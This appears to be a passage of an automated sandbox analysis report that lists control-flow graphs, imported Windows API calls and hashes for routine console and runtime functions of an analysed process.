                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 992 7ff7d151c620-7ff7d151c66f GetConsoleTitleW 993 7ff7d152c5f2 992->993 994 7ff7d151c675-7ff7d151c687 call 7ff7d151af14 992->994 996 7ff7d152c5fc-7ff7d152c60c GetLastError 993->996 999 7ff7d151c689 994->999 1000 7ff7d151c68e-7ff7d151c69d call 7ff7d151ca40 994->1000 998 7ff7d152c5e3 call 7ff7d1513278 996->998 1003 7ff7d152c5e8-7ff7d152c5ed call 7ff7d152855c 998->1003 999->1000 1000->1003 1005 7ff7d151c6a3-7ff7d151c6ac 1000->1005 1003->993 1007 7ff7d151c6b2-7ff7d151c6c5 call 7ff7d151b9c0 1005->1007 1008 7ff7d151c954-7ff7d151c95e call 7ff7d152291c 1005->1008 1015 7ff7d151c6cb-7ff7d151c6ce 1007->1015 1016 7ff7d151c9b5-7ff7d151c9b8 call 7ff7d1525c6c 1007->1016 1013 7ff7d152c5de-7ff7d152c5e0 1008->1013 1014 7ff7d151c964-7ff7d151c96b call 7ff7d15189c0 1008->1014 1013->998 1020 7ff7d151c970-7ff7d151c972 1014->1020 1015->1003 1018 7ff7d151c6d4-7ff7d151c6e9 1015->1018 1023 7ff7d151c9bd-7ff7d151c9c9 call 7ff7d152855c 1016->1023 1021 7ff7d151c6ef-7ff7d151c6fa 1018->1021 1022 7ff7d152c616-7ff7d152c620 call 7ff7d152855c 1018->1022 1020->996 1024 7ff7d151c978-7ff7d151c99a towupper 1020->1024 1025 7ff7d152c627 1021->1025 1026 7ff7d151c700-7ff7d151c713 1021->1026 1022->1025 1039 7ff7d151c9d0-7ff7d151c9d7 1023->1039 1029 7ff7d151c9a0-7ff7d151c9a9 1024->1029 1031 7ff7d152c631 1025->1031 1030 7ff7d151c719-7ff7d151c72c 1026->1030 1026->1031 1029->1029 1034 7ff7d151c9ab-7ff7d151c9af 1029->1034 1035 7ff7d152c63b 1030->1035 1036 7ff7d151c732-7ff7d151c747 call 7ff7d151d3f0 1030->1036 1031->1035 1034->1016 1037 7ff7d152c60e-7ff7d152c611 call 7ff7d153ec14 1034->1037 1040 7ff7d152c645 1035->1040 1045 7ff7d151c8ac-7ff7d151c8af 1036->1045 1046 7ff7d151c74d-7ff7d151c750 1036->1046 1037->1022 1043 7ff7d151c9dd-7ff7d152c6da SetConsoleTitleW 1039->1043 1044 7ff7d151c872-7ff7d151c8aa call 7ff7d152855c call 7ff7d1528f80 1039->1044 1050 7ff7d152c64e-7ff7d152c651 1040->1050 1043->1044 1045->1046 1049 7ff7d151c8b5-7ff7d151c8d3 wcsncmp 1045->1049 1051 7ff7d151c76a-7ff7d151c76d 1046->1051 1052 7ff7d151c752-7ff7d151c764 call 7ff7d151bd38 1046->1052 1049->1051 1056 7ff7d151c8d9 1049->1056 1057 7ff7d152c657-7ff7d152c65b 1050->1057 1058 7ff7d151c80d-7ff7d151c811 1050->1058 1054 7ff7d151c840-7ff7d151c84b call 7ff7d151cb40 1051->1054 1055 7ff7d151c773-7ff7d151c77a 1051->1055 1052->1003 1052->1051 1077 7ff7d151c84d-7ff7d151c855 call 7ff7d151cad4 1054->1077 1078 7ff7d151c856-7ff7d151c86c 1054->1078 1062 7ff7d151c780-7ff7d151c784 1055->1062 1056->1046 1057->1058 1064 7ff7d151c817-7ff7d151c81b 1058->1064 1065 7ff7d151c9e2-7ff7d151c9e7 1058->1065 1068 7ff7d151c78a-7ff7d151c7a4 wcschr 1062->1068 1069 7ff7d151c83d 1062->1069 1071 7ff7d151ca1b-7ff7d151ca1f 1064->1071 1072 7ff7d151c821 1064->1072 1065->1064 1067 7ff7d151c9ed-7ff7d151c9f7 call 7ff7d152291c 1065->1067 1086 7ff7d151c9fd-7ff7d151ca00 1067->1086 1087 7ff7d152c684-7ff7d152c698 call 7ff7d1513278 1067->1087 1075 7ff7d151c7aa-7ff7d151c7ad 1068->1075 1076 7ff7d151c8de-7ff7d151c8f7 1068->1076 1069->1054 1071->1072 1079 7ff7d151ca25-7ff7d152c6b3 call 7ff7d1513278 1071->1079 1073 7ff7d151c824-7ff7d151c82d 1072->1073 1073->1073 1080 7ff7d151c82f-7ff7d151c837 1073->1080 1082 7ff7d151c7b0-7ff7d151c7b8 1075->1082 1083 7ff7d151c900-7ff7d151c908 1076->1083 1077->1078 1078->1039 1078->1044 1079->1003 1080->1062 1080->1069 1082->1082 1088 7ff7d151c7ba-7ff7d151c7c7 1082->1088 1083->1083 1089 7ff7d151c90a-7ff7d151c915 1083->1089 1086->1064 1093 7ff7d151ca06-7ff7d151ca10 call 7ff7d15189c0 1086->1093 1087->1003 1088->1050 1094 7ff7d151c7cd-7ff7d151c7db 1088->1094 1095 7ff7d151c917 1089->1095 1096 7ff7d151c93a-7ff7d151c944 1089->1096 1093->1064 1111 7ff7d151ca16-7ff7d152c67f GetLastError call 7ff7d1513278 1093->1111 1100 7ff7d151c7e0-7ff7d151c7e7 1094->1100 1101 7ff7d151c920-7ff7d151c928 1095->1101 1103 7ff7d151ca2a-7ff7d151ca2f call 7ff7d1529158 1096->1103 1104 7ff7d151c94a 1096->1104 1106 7ff7d151c7e9-7ff7d151c7f1 1100->1106 1107 7ff7d151c800-7ff7d151c803 1100->1107 1108 7ff7d151c92a-7ff7d151c92f 1101->1108 1109 7ff7d151c932-7ff7d151c938 1101->1109 1103->1013 1104->1008 1106->1107 1112 7ff7d151c7f3-7ff7d151c7fe 1106->1112 1107->1040 1113 7ff7d151c809 1107->1113 1108->1109 1109->1096 1109->1101 1111->1003 1112->1100 1112->1107 1113->1058
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleTitlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: /$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2364928044-4222935259
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e2ca0c16b49d53aeb54f77df9532cc4c6649e3e8c7334f42884c1fbeddce7399
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CC18C62A1864B81FB65BB15A4542BDB2A1AF41B90FC64132D91F472F5DFBDE884C330
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1528D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1171 7ff7d1528d80-7ff7d1528da2 1172 7ff7d1528da4-7ff7d1528daf 1171->1172 1173 7ff7d1528dcc 1172->1173 1174 7ff7d1528db1-7ff7d1528db4 1172->1174 1177 7ff7d1528dd1-7ff7d1528dd9 1173->1177 1175 7ff7d1528dbf-7ff7d1528dca Sleep 1174->1175 1176 7ff7d1528db6-7ff7d1528dbd 1174->1176 1175->1172 1176->1177 1178 7ff7d1528de7-7ff7d1528def 1177->1178 1179 7ff7d1528ddb-7ff7d1528de5 _amsg_exit 1177->1179 1181 7ff7d1528df1-7ff7d1528e0a 1178->1181 1182 7ff7d1528e46 1178->1182 1180 7ff7d1528e4c-7ff7d1528e54 1179->1180 1183 7ff7d1528e56-7ff7d1528e69 _initterm 1180->1183 1184 7ff7d1528e73-7ff7d1528e75 1180->1184 1185 7ff7d1528e0e-7ff7d1528e11 1181->1185 1182->1180 1183->1184 1188 7ff7d1528e77-7ff7d1528e79 1184->1188 1189 7ff7d1528e80-7ff7d1528e88 1184->1189 1186 7ff7d1528e38-7ff7d1528e3a 1185->1186 1187 7ff7d1528e13-7ff7d1528e15 1185->1187 1186->1180 1191 7ff7d1528e3c-7ff7d1528e41 1186->1191 1190 7ff7d1528e17-7ff7d1528e1b 1187->1190 1187->1191 1188->1189 1192 7ff7d1528e8a-7ff7d1528e98 call 7ff7d15294f0 1189->1192 1193 7ff7d1528eb4-7ff7d1528ec8 call 7ff7d15237d8 1189->1193 1194 7ff7d1528e2d-7ff7d1528e36 1190->1194 1195 7ff7d1528e1d-7ff7d1528e29 1190->1195 1197 7ff7d1528f28-7ff7d1528f3d 1191->1197 1192->1193 1201 7ff7d1528e9a-7ff7d1528eaa 1192->1201 1200 7ff7d1528ecd-7ff7d1528eda 1193->1200 1194->1185 1195->1194 1203 7ff7d1528edc-7ff7d1528ede exit 1200->1203 1204 7ff7d1528ee4-7ff7d1528eeb 1200->1204 1201->1193 1203->1204 1205 7ff7d1528ef9 1204->1205 1206 7ff7d1528eed-7ff7d1528ef3 _cexit 1204->1206 1205->1197 1206->1205
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4291973834-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d5c798492a9ea8eadece112d5374d136a8042fe81ae4d24956d32f1238edd288
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0541C922A0861F86F750BB50E94027DA2E0AF54754FE444B7EA1F876B4DFFCE8448760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15189C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1207 7ff7d15189c0-7ff7d1518a3d memset call 7ff7d151ca40 1210 7ff7d1518ace-7ff7d1518adf 1207->1210 1211 7ff7d1518a43-7ff7d1518a71 GetDriveTypeW 1207->1211 1212 7ff7d1518aed 1210->1212 1213 7ff7d1518ae1-7ff7d1518ae8 ??_V@YAXPEAX@Z 1210->1213 1214 7ff7d1518a77-7ff7d1518a7a 1211->1214 1215 7ff7d152b411-7ff7d152b422 1211->1215 1216 7ff7d1518aef-7ff7d1518b16 call 7ff7d1528f80 1212->1216 1213->1212 1214->1210 1219 7ff7d1518a7c-7ff7d1518a7f 1214->1219 1217 7ff7d152b430-7ff7d152b435 1215->1217 1218 7ff7d152b424-7ff7d152b42b ??_V@YAXPEAX@Z 1215->1218 1217->1216 1218->1217 1219->1210 1220 7ff7d1518a81-7ff7d1518ac8 GetVolumeInformationW 1219->1220 1220->1210 1222 7ff7d152b3fc-7ff7d152b40b GetLastError 1220->1222 1222->1210 1222->1215
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 850181435-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0ba5561c39cb0703637671c1dbe0801599e515224e2f0d308e9bfb8045a321cf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC41B032608AC6CAEB709F20D8402EDB7A0FB89744FD54062DA4E47B64CF7CD145C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1224 7ff7d1524a14-7ff7d1524a3e GetEnvironmentStringsW 1225 7ff7d1524aae-7ff7d1524ac5 1224->1225 1226 7ff7d1524a40-7ff7d1524a46 1224->1226 1227 7ff7d1524a48-7ff7d1524a52 1226->1227 1228 7ff7d1524a59-7ff7d1524a8f GetProcessHeap HeapAlloc 1226->1228 1227->1227 1229 7ff7d1524a54-7ff7d1524a57 1227->1229 1230 7ff7d1524a9f-7ff7d1524aa9 FreeEnvironmentStringsW 1228->1230 1231 7ff7d1524a91-7ff7d1524a9a memmove 1228->1231 1229->1227 1229->1228 1230->1225 1231->1230
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1623332820-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 698b0477c31b57655b8129feebdd0b7bf6dc0c8220588d9c75094cd329cf8be1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93119122A1579B82EB50AB01A41403DFBA1FB8AF80BD99076DE4F03765DFBDE4418760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1826527819-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f8285144374bbb89e131d7d8273940fb18d22798a679a0c343d3d7f73308b0f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35015B2190868BCAF704BB14E4542BCFAA0EB8AB55FD46172E94F033B1CFBCA044C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1523060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1521EA0: wcschr.MSVCRT(?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7D1540D54), ref: 00007FF7D1521EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7D15192AC), ref: 00007FF7D15230CA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF7D15230DD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D15230F6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE ref: 00007FF7D1523106
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1464828906-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 13675d2372c316cd7a7c50d6965756c4bc3950d983800b2edb6765f6a99b1507
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA31D623E1865B82F764BF15A44007EF661EB49B90FE48176DA4B873F0EEBDE8458710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151CA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
